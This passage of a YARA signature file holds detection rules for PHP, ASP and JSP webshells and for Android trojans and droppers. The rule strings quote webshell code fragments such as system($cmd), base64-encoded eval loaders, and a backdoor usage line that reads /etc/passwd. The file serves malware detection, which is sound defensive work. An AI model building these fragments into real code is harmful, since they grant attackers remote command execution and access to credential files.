   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "8baa99666bf3734cbdfdd10088e0cd9f"   
   	strings:   
   		$s9 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword   
   	condition:   
   		all of them   
rule Ajan_asp {   
   	meta:   
   		description = "Semi-Auto-generated  - file Ajan.asp.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "b6f468252407efc2318639da22b08af0"   
   	strings:   
   		$s1 = "c:\\downloaded.zip"   
   		$s2 = "Set entrika = entrika.CreateTextFile(\"c:\\net.vbs\", True)" fullword   
   		$s3 = "http://www35.websamba.com/cybervurgun/"   
   	condition:   
   		1 of them   
rule WebShell_Web_shell__c_ShAnKaR {   
   	meta:   
   		description = "PHP Webshells Github Archive - file Web-shell (c)ShAnKaR.php"   
   		author = "Florian Roth"   
   		hash = "3dd4f25bd132beb59d2ae0c813373c9ea20e1b7a"   
   	strings:   
   		$s0 = "header(\"Content-Length: \".filesize($_POST['downf']));" fullword   
   		$s5 = "if($_POST['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dump"   
   		$s6 = "write(\"#\\n#Server : \".getenv('SERVER_NAME').\"" fullword   
   		$s12 = "foreach(@file($_POST['passwd']) as $fed)echo $fed;" fullword   
   	condition:   
   		2 of them   
rule webshell_phpspy2010 {   
   	meta:   
   		description = "Web Shell - file phpspy2010.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "14ae0e4f5349924a5047fed9f3b105c5"   
   	strings:   
   		$s3 = "eval(gzinflate(base64_decode("   
   		$s5 = "//angel" fullword   
   		$s8 = "$admin['cookiedomain'] = '';" fullword   
   	condition:   
   		all of them   
rule aZRaiLPhp_v1_0_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file aZRaiLPhp v1.0.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "26b2d3943395682e36da06ed493a3715"   
   	strings:   
   		$s0 = "azrailphp"   
   		$s1 = "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>"   
   		$s3 = "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>"   
   	condition:   
   		2 of them   
rule FSO_s_phvayv_2 {   
   	meta:   
   		description = "Webshells Auto-generated - file phvayv.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "205ecda66c443083403efb1e5c7f7878"   
   	strings:   
   		$s2 = "rows=\"24\" cols=\"122\" wrap=\"OFF\">XXXX</textarea></font><font"   
   	condition:   
   		all of them   
rule webshell_Dive_Shell_1_0_Emperor_Hacking_Team_xxx {   
   	meta:   
   		description = "Web Shell - from files Dive Shell 1.0 - Emperor Hacking Team.php, phpshell.php, SimShell 1.0 - Simorgh Security MGZ.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "1b5102bdc41a7bc439eea8f0010310a5"   
   		hash1 = "f8a6d5306fb37414c5c772315a27832f"   
   		hash2 = "37cb1db26b1b0161a4bf678a6b4565bd"   
   	strings:   
   		$s1 = "if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== fals"   
   		$s9 = "if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {" fullword   
   	condition:   
   		all of them   
rule webshell_webshell_cnseay02_1 {   
   	meta:   
   		description = "Web Shell - file webshell-cnseay02-1.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "95fc76081a42c4f26912826cb1bd24b1"   
   	strings:   
   		$s0 = "(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU"   
   	condition:   
   		all of them   
rule WebShell_php_webshells_MyShell {   
   	meta:   
   		description = "PHP Webshells Github Archive - file MyShell.php"   
   		author = "Florian Roth"   
   		hash = "42e283c594c4d061f80a18f5ade0717d3fb2f76d"   
   	strings:   
   		$s3 = "<title>MyShell error - Access Denied</title>" fullword   
   		$s4 = "$adminEmail = \"youremail@yourserver.com\";" fullword   
   		$s5 = "//A workdir has been asked for - we chdir to that dir." fullword   
   		$s6 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o"   
   		$s13 = "#$autoErrorTrap Enable automatic error traping if command returns error." fullword   
   		$s14 = "/* No work_dir - we chdir to $DOCUMENT_ROOT */" fullword   
   		$s19 = "#every command you excecute." fullword   
   		$s20 = "<form name=\"shell\" method=\"post\">" fullword   
   	condition:   
   		3 of them   
rule webshell_php_404 {   
   	meta:   
   		description = "Web Shell - file 404.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "ced050df5ca42064056a7ad610a191b3"   
   	strings:   
   		$s0 = "$pass = md5(md5(md5($pass)));" fullword   
   	condition:   
   		all of them   
rule webshell_drag_system {   
   	meta:   
   		description = "Web Shell - file system.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "15ae237cf395fb24cf12bff141fb3f7c"   
   	strings:   
   		$s9 = "String sql = \"SELECT * FROM DBA_TABLES WHERE TABLE_NAME not like '%$%' and num_"   
   	condition:   
   		all of them   
rule phpbackdoor15_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file phpbackdoor15.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "0fdb401a49fc2e481e3dfd697078334b"   
   	strings:   
   		$s1 = "echo \"fichier telecharge dans \".good_link(\"./\".$_FILES[\"fic\"][\"na"   
   		$s2 = "if(move_uploaded_file($_FILES[\"fic\"][\"tmp_name\"],good_link(\"./\".$_FI"   
   		$s3 = "echo \"Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez s"   
   	condition:   
   		1 of them   
rule webshell_ASP_RemExp {   
   	meta:   
   		description = "Web Shell - file RemExp.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "aa1d8491f4e2894dbdb91eec1abc2244"   
   	strings:   
   		$s0 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Reques"   
   		$s1 = "Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal"   
   	condition:   
   		all of them   
rule by064cli {   
   	meta:   
   		description = "Webshells Auto-generated - file by064cli.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "10e0dff366968b770ae929505d2a9885"   
   	strings:   
   		$s7 = "packet dropped,redirecting"   
   		$s9 = "input the password(the default one is 'by')"   
   	condition:   
   		all of them   
rule WebShell_php_webshells_matamu {   
   	meta:   
   		description = "PHP Webshells Github Archive - file matamu.php"   
   		author = "Florian Roth"   
   		hash = "d477aae6bd2f288b578dbf05c1c46b3aaa474733"   
   	strings:   
   		$s2 = "$command .= ' -F';" fullword   
   		$s3 = "/* We try and match a cd command. */" fullword   
   		$s4 = "directory... Trust me - it works :-) */" fullword   
   		$s5 = "$command .= \" 1> $tmpfile 2>&1; \" ." fullword   
   		$s10 = "$new_dir = $regs[1]; // 'cd /something/...'" fullword   
   		$s16 = "/* The last / in work_dir were the first charecter." fullword   
   	condition:   
   		2 of them   
rule SimAttacker___Vrsion_1_0_0___priv8_4_My_friend_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "089ff24d978aeff2b4b2869f0c7d38a3"   
   	strings:   
   		$s0 = "SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend"   
   		$s3 = " fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim"   
   		$s4 = "echo \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora"   
   	condition:   
   		1 of them   
rule WebShell_Generic_PHP_10 {   
   	meta:   
   		description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php, PHPRemoteView.php"   
   		author = "Florian Roth"   
   		super_rule = 1   
   		hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38"   
   		hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"   
   		hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"   
   		hash3 = "7d5b54c7cab6b82fb7d131d7bbb989fd53cb1b57"   
   	strings:   
   		$s2 = "$world[\"execute\"] = ($world['execute']=='x') ? 't' : 'T'; " fullword   
   		$s6 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; " fullword   
   		$s11 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; " fullword   
   		$s12 = "else if( $mode & 0xA000 ) " fullword   
   		$s17 = "$s=sprintf(\"%1s\", $type); " fullword   
   		$s20 = "font-size: 8pt;" fullword   
   	condition:   
   		all of them   
rule rknt_zip_Folder_RkNT {   
   	meta:   
   		description = "Webshells Auto-generated - file RkNT.dll"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "5f97386dfde148942b7584aeb6512b85"   
   	strings:   
   		$s0 = "PathStripPathA"   
   		$s1 = "`cLGet!Addr%"   
   		$s2 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"   
   		$s3 = "oQToOemBuff* <="   
   		$s4 = "ionCdunAsw[Us'"   
   		$s6 = "CreateProcessW: %S"   
   		$s7 = "ImageDirectoryEntryToData"   
   	condition:   
   		all of them   
rule binder2_binder2 {   
   	meta:   
   		description = "Webshells Auto-generated - file binder2.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "d594e90ad23ae0bc0b65b59189c12f11"   
   	strings:   
   		$s0 = "IsCharAlphaNumericA"   
   		$s2 = "WideCharToM"   
   		$s4 = "g 5pur+virtu!"   
   		$s5 = "\\syslog.en"   
   		$s6 = "heap7'7oqk?not="   
   		$s8 = "- Kablto in"   
   	condition:   
   		all of them   
rule u_uay {   
   	meta:   
   		description = "Webshells Auto-generated - file uay.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "abbc7b31a24475e4c5d82fc4c2b8c7c4"   
   	strings:   
   		$s1 = "exec \"c:\\WINDOWS\\System32\\freecell.exe"   
   		$s9 = "SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security"   
   	condition:   
   		1 of them   
rule webshell_Mysql_interface_v1_0 {   
   	meta:   
   		description = "Web Shell - file Mysql interface v1.0.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "a12fc0a3d31e2f89727b9678148cd487"   
   	strings:   
   		$s0 = "echo \"<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\\\"return"   
   	condition:   
   		all of them   
rule phvayvv_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file phvayvv.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "35fb37f3c806718545d97c6559abd262"   
   	strings:   
   		$s0 = "{mkdir(\"$dizin/$duzenx2\",777)"   
   		$s1 = "$baglan=fopen($duzkaydet,'w');"   
   		$s2 = "PHVayv 1.0"   
   	condition:   
   		1 of them   
rule WebShell_b374k_mini_shell_php_php {   
   	meta:   
   		description = "PHP Webshells Github Archive - file b374k-mini-shell-php.php.php"   
   		author = "Florian Roth"   
   		hash = "afb88635fbdd9ebe86b650cc220d3012a8c35143"   
   	strings:   
   		$s0 = "@error_reporting(0);" fullword   
   		$s2 = "@eval(gzinflate(base64_decode($code)));" fullword   
   		$s3 = "@set_time_limit(0); " fullword   
   	condition:   
   		all of them   
rule telnet_pl {   
   	meta:   
   		description = "Semi-Auto-generated  - file telnet.pl.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "dd9dba14383064e219e29396e242c1ec"   
   	strings:   
   		$s0 = "W A R N I N G: Private Server"   
   		$s2 = "$Message = q$<pre><font color=\"#669999\"> _____  _____  _____          _____   "   
   	condition:   
   		all of them   
rule FeliksPack3___PHP_Shells_usr {   
   	meta:   
   		description = "Webshells Auto-generated - file usr.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "ade3357520325af50c9098dc8a21a024"   
   	strings:   
   		$s0 = "<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor"   
   	condition:   
   		all of them   
rule webshell_c99_c99shell_c99_c99shell {   
   	meta:   
   		description = "Web Shell - from files c99.php, c99shell.php, c99.php, c99shell.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"   
   		hash1 = "d3f38a6dc54a73d304932d9227a739ec"   
   		hash2 = "157b4ac3c7ba3a36e546e81e9279eab5"   
   		hash3 = "048ccc01b873b40d57ce25a4c56ea717"   
   	strings:   
   		$s2 = "$bindport_pass = \"c99\";" fullword   
   		$s5 = " else {echo \"<b>Execution PHP-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr"   
   	condition:   
   		1 of them   
rule kacak_asp {   
   	meta:   
   		description = "Semi-Auto-generated  - file kacak.asp.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "907d95d46785db21331a0324972dda8c"   
   	strings:   
   		$s0 = "Kacak FSO 1.0"   
   		$s1 = "if request.querystring(\"TGH\") = \"1\" then"   
   		$s3 = "<font color=\"#858585\">BuqX</font></a></font><font face=\"Verdana\" style="   
   		$s4 = "mailto:BuqX@hotmail.com"   
   	condition:   
   		1 of them   
rule WebShell_safe0ver {   
   	meta:   
   		description = "PHP Webshells Github Archive - file safe0ver.php"   
   		author = "Florian Roth"   
   		hash = "366639526d92bd38ff7218b8539ac0f154190eb8"   
   	strings:   
   		$s3 = "$scriptident = \"$scriptTitle By Evilc0der.com\";" fullword   
   		$s4 = "while (file_exists(\"$lastdir/newfile$i.txt\"))" fullword   
   		$s5 = "else { /* <!-- Then it must be a File... --> */" fullword   
   		$s7 = "$contents .= htmlentities( $line ) ;" fullword   
   		$s8 = "<br><p><br>Safe Mode ByPAss<p><form method=\"POST\">" fullword   
   		$s14 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword   
   		$s20 = "/* <!-- End of Actions --> */" fullword   
   	condition:   
   		3 of them   
rule DarkSpy105 {   
   	meta:   
   		description = "Webshells Auto-generated - file DarkSpy105.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "f0b85e7bec90dba829a3ede1ab7d8722"   
   	strings:   
   		$s7 = "Sorry,DarkSpy got an unknown exception,please re-run it,thanks!"   
   	condition:   
   		all of them   
rule Webshell_AcidPoison {   
   	meta:   
   		description = "Detects Poison Sh3ll - Webshell"   
   		author = "Florian Roth"   
   		reference = "https://github.com/nikicat/web-malware-collection"   
   		date = "2016-01-11"   
   		score = 70   
   		hash1 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"   
   		hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"   
   		hash3 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"   
   		hash4 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"   
   		hash5 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"   
   		hash6 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"   
   		hash7 = "be541cf880a8e389a0767b85f1686443f35b508d1975ee25e1ce3f08fa32cfb5"   
   		hash8 = "be541cf880a8e389a0767b85f1686443f35b508d1975ee25e1ce3f08fa32cfb5"   
   		hash9 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"   
   		hash10 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"   
   	strings:   
   		$s1 = "elseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }" fullword ascii   
   	condition:   
   		filesize < 550KB and all of them   
rule webshell_r57shell_r57shell127_SnIpEr_SA_Shell_EgY_SpIdEr_ShElL_V2_r57_xxx {   
   	meta:   
   		description = "Web Shell - from files r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "ef43fef943e9df90ddb6257950b3538f"   
   		hash1 = "ae025c886fbe7f9ed159f49593674832"   
   		hash2 = "911195a9b7c010f61b66439d9048f400"   
   		hash3 = "697dae78c040150daff7db751fc0c03c"   
   		hash4 = "513b7be8bd0595c377283a7c87b44b2e"   
   		hash5 = "1d912c55b96e2efe8ca873d6040e3b30"   
   		hash6 = "e5b2131dd1db0dbdb43b53c5ce99016a"   
   		hash7 = "4108f28a9792b50d95f95b9e5314fa1e"   
   		hash8 = "41af6fd253648885c7ad2ed524e0692d"   
   		hash9 = "6fcc283470465eed4870bcc3e2d7f14d"   
   	strings:   
   		$s2 = "echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_name"   
   		$s3 = "echo sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1"   
   		$s9 = "echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size="   
   	condition:   
   		all of them   
rule Dive_Shell_1_0___Emperor_Hacking_Team_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file Dive Shell 1.0 - Emperor Hacking Team.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "1b5102bdc41a7bc439eea8f0010310a5"   
   	strings:   
   		$s0 = "Emperor Hacking TEAM"   
   		$s1 = "Simshell" fullword   
   		$s2 = "ereg('^[[:blank:]]*cd[[:blank:]]"   
   		$s3 = "<form name=\"shell\" action=\"<?php echo $_SERVER['PHP_SELF'] ?>\" method=\"POST"   
   	condition:   
   		2 of them   
rule webshell_404_data_suiyue {   
   	meta:   
   		description = "Web Shell - from files 404.jsp, data.jsp, suiyue.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "7066f4469c3ec20f4890535b5f299122"   
   		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"   
   		hash2 = "c93d5bdf5cf62fe22e299d0f2b865ea7"   
   	strings:   
   		$s3 = " sbCopy.append(\"<input type=button name=goback value=' \"+strBack[languageNo]+"   
   	condition:   
   		all of them   
rule webshell_webshell_123 {   
   	meta:   
   		description = "Web shells - generated from file webshell-123.php"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "2782bb170acaed3829ea9a04f0ac7218"   
   	strings:   
   		$s0 = "// Web Shell!!" fullword   
   		$s1 = "@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6"   
   		$s3 = "$default_charset = \"UTF-8\";" fullword   
   		$s4 = "// url:http://www.weigongkai.com/shell/" fullword   
   	condition:   
   		2 of them   
rule cmd_asp_5_1_asp {   
   	meta:   
   		description = "Semi-Auto-generated  - file cmd-asp-5.1.asp.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "8baa99666bf3734cbdfdd10088e0cd9f"   
   	strings:   
   		$s0 = "Call oS.Run(\"win.com cmd.exe /c del \"& szTF,0,True)" fullword   
   		$s3 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword   
   	condition:   
   		1 of them   
rule webshell_PHP_404 {   
   	meta:   
   		description = "Web Shell - file 404.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "078c55ac475ab9e028f94f879f548bca"   
   	strings:   
   		$s4 = "<span>Posix_getpwuid (\"Read\" /etc/passwd)"   
   	condition:   
   		all of them   
rule WebShell_c99_locus7s {   
   	meta:   
   		description = "PHP Webshells Github Archive - file c99_locus7s.php"   
   		author = "Florian Roth"   
   		hash = "d413d4700daed07561c9f95e1468fb80238fbf3c"   
   	strings:   
   		$s8 = "$encoded = base64_encode(file_get_contents($d.$f)); " fullword   
   		$s9 = "$file = $tmpdir.\"dump_\".getenv(\"SERVER_NAME\").\"_\".$db.\"_\".date(\"d-m-Y"   
   		$s10 = "else {$tmp = htmlspecialchars(\"./dump_\".getenv(\"SERVER_NAME\").\"_\".$sq"   
   		$s11 = "$c99sh_sourcesurl = \"http://locus7s.com/\"; //Sources-server " fullword   
   		$s19 = "$nixpwdperpage = 100; // Get first N lines from /etc/passwd " fullword   
   	condition:   
   		2 of them   
rule WebShell_JspWebshell_1_2 {   
   	meta:   
   		description = "PHP Webshells Github Archive - file JspWebshell_1.2.php"   
   		author = "Florian Roth"   
   		hash = "0bed4a1966117dd872ac9e8dceceb54024a030fa"   
   	strings:   
   		$s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword   
   		$s1 = "String password=request.getParameter(\"password\");" fullword   
   		$s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java."   
   		$s7 = "String editfile=request.getParameter(\"editfile\");" fullword   
   		$s8 = "//String tempfilename=request.getParameter(\"file\");" fullword   
   		$s12 = "password = (String)session.getAttribute(\"password\");" fullword   
   	condition:   
   		3 of them   
rule WebShell__CrystalShell_v_1_sosyete_stres {   
   	meta:   
   		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, sosyete.php, stres.php"   
   		author = "Florian Roth"   
   		super_rule = 1   
   		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"   
   		hash1 = "e32405e776e87e45735c187c577d3a4f98a64059"   
   		hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"   
   	strings:   
   		$s1 = "A:visited { COLOR:blue; TEXT-DECORATION: none}" fullword   
   		$s4 = "A:active {COLOR:blue; TEXT-DECORATION: none}" fullword   
   		$s11 = "scrollbar-darkshadow-color: #101842;" fullword   
   		$s15 = "<a bookmark=\"minipanel\">" fullword   
   		$s16 = "background-color: #EBEAEA;" fullword   
   		$s18 = "color: #D5ECF9;" fullword   
   		$s19 = "<center><TABLE style=\"BORDER-COLLAPSE: collapse\" height=1 cellSpacing=0 border"   
   	condition:   
   		all of them   
rule webshell_jsp_k8cmd {   
   	meta:   
   		description = "Web Shell - file k8cmd.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "b39544415e692a567455ff033a97a682"   
   	strings:   
   		$s2 = "if(request.getSession().getAttribute(\"hehe\").toString().equals(\"hehe\"))" fullword   
   	condition:   
   		all of them   
rule webshell_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file webshell.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "e425241b928e992bde43dd65180a4894"   
   	strings:   
   		$s2 = "<die(\"Couldn't Read directory, Blocked!!!\");"   
   		$s3 = "PHP Web Shell"   
   	condition:   
   		all of them   
rule WebShell_simple_cmd {   
   	meta:   
   		description = "PHP Webshells Github Archive - file simple_cmd.php"   
   		author = "Florian Roth"   
   		hash = "466a8caf03cdebe07aa16ad490e54744f82e32c2"   
   	strings:   
   		$s1 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword   
   		$s2 = "<title>G-Security Webshell</title>" fullword   
   		$s4 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword   
   		$s6 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword   
   	condition:   
   		1 of them   
rule laudanum : webshell {   
   	meta:   
   		description = "Laudanum Injector Tools - file laudanum.php"   
   		author = "Florian Roth"   
   		reference = "http://laudanum.inguardians.com/"   
   		date = "2015-06-22"   
   		hash = "fd498c8b195967db01f68776ff5e36a06c9dfbfe"   
   	strings:   
   		$s1 = "public function __activate()" fullword ascii   
   		$s2 = "register_activation_hook(__FILE__, array('WP_Laudanum', 'activate'));" fullword ascii /* PEStudio Blacklist: strings */   
   	condition:   
   		filesize < 5KB and all of them   
rule webshell_r57_1_4_0 {   
   	meta:   
   		description = "Web Shell - file r57.1.4.0.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "574f3303e131242568b0caf3de42f325"   
   	strings:   
   		$s4 = "@ini_set('error_log',NULL);" fullword   
   		$s6 = "$pass='abcdef1234567890abcdef1234567890';" fullword   
   		$s7 = "@ini_restore(\"disable_functions\");" fullword   
   		$s9 = "@ini_restore(\"safe_mode_exec_dir\");" fullword   
   	condition:   
   		all of them   
rule MySQL_Web_Interface_Version_0_8_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file MySQL Web Interface Version 0.8.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "36d4f34d0a22080f47bb1cb94107c60f"   
   	strings:   
   		$s0 = "SooMin Kim"   
   		$s1 = "http://popeye.snu.ac.kr/~smkim/mysql"   
   		$s2 = "href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename"   
   		$s3 = "<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofi"   
   	condition:   
   		2 of them   
rule WebShell_Simple_PHP_backdoor_by_DK {   
   	meta:   
   		description = "PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php"   
   		author = "Florian Roth"   
   		hash = "03f6215548ed370bec0332199be7c4f68105274e"   
   	strings:   
   		$s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword   
   		$s1 = "<!--    http://michaeldaw.org   2006    -->" fullword   
   		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword   
   		$s6 = "if(isset($_REQUEST['cmd'])){" fullword   
   		$s8 = "system($cmd);" fullword   
   	condition:   
   		2 of them   
rule admin_ad {   
   	meta:   
   		description = "Webshells Auto-generated - file admin-ad.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "e6819b8f8ff2f1073f7d46a0b192f43b"   
   	strings:   
   		$s6 = "<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" siz"   
   		$s7 = "Response.write\"<a href='\"&url&\"?path=\"&Request(\"oldpath\")&\"&attrib=\"&attrib&\"'><"   
   	condition:   
   		all of them   
rule WebShell_webshells_zehir4 {   
   	meta:   
   		description = "Webshells Github Archive - file zehir4"   
   		author = "Florian Roth"   
   		hash = "788928ae87551f286d189e163e55410acbb90a64"   
   		score = 55   
   	strings:   
   		$s0 = "frames.byZehir.document.execCommand(command, false, option);" fullword   
   		$s8 = "response.Write \"<title>ZehirIV --> Powered By Zehir &lt;zehirhacker@hotmail.com"   
   	condition:   
   		1 of them   
rule webshell_jsp_IXRbE {   
   	meta:   
   		description = "Web Shell - file IXRbE.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "e26e7e0ebc6e7662e1123452a939e2cd"   
   	strings:   
   		$s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application"   
   	condition:   
   		all of them   
// https://otx.alienvault.com/pulse/5601b6c967db8c6fb351bbca
rule Mapin : android   
   {   
       meta:   
           author = "https://twitter.com/plutec_net"   
           source = "https://koodous.com/"   
           reference = "http://www.welivesecurity.com/2015/09/22/android-trojan-drops-in-despite-googles-bouncer/"   
           description = "Mapin trojan, not for droppers"   
           sample = "7f208d0acee62712f3fa04b0c2744c671b3a49781959aaf6f72c2c6672d53776"   
      
       strings:   
           $a = "138675150963" //GCM id   
           $b = "res/xml/device_admin.xml"   
           $c = "Device registered: regId ="   
              
      
       condition:   
           all of them   
              
rule dropperMapin : android   
   {   
       meta:   
           author = "https://twitter.com/plutec_net"   
           source = "https://koodous.com/"   
           reference = "http://www.welivesecurity.com/2015/09/22/android-trojan-drops-in-despite-googles-bouncer/"   
           description = "This rule detects mapin dropper files"   
           sample = "7e97b234a5f169e41a2d6d35fadc786f26d35d7ca60ab646fff947a294138768"   
           sample2 = "bfd13f624446a2ce8dec9006a16ae2737effbc4e79249fd3d8ea2dc1ec809f1a"   
      
       strings:   
           $a = ":Write APK file (from txt in assets) to SDCard sucessfully!"   
           $b = "4Write APK (from Txt in assets) file to SDCard  Fail!"   
           $c = "device_admin"   
      
       condition:   
           all of them   
// https://otx.alienvault.com/pulse/5977da8609721165b1362a3a
rule dropper:realshell android {   
       meta:   
           author = "https://twitter.com/plutec_net"   
           reference = "https://koodous.com/"   
           source = "https://blog.malwarebytes.org/mobile-2/2015/06/complex-method-of-obfuscation-found-in-dropper-realshell/"   
       strings:   
           $b = "Decrypt.malloc.memset.free.pluginSMS_encrypt.Java_com_skymobi_pay_common_util_LocalDataDecrpty_Encrypt.strcpy"   
          
       condition:   
           $b   
// https://otx.alienvault.com/pulse/5977d93c481b4c7935f5f811
rule smsfraud2 : android {   
       meta:   
           author = "Antonio Snchez https://twitter.com/plutec_net"   
           reference = "https://koodous.com/"   
           sample = "0200a454f0de2574db0b58421ea83f0f340bc6e0b0a051fe943fdfc55fea305b"   
           sample2 = "bff3881a8096398b2ded8717b6ce1b86a823e307c919916ab792a13f2f5333b6"   
      
       strings:   
           $a = "pluginSMS_decrypt"   
           $b = "pluginSMS_encrypt"   
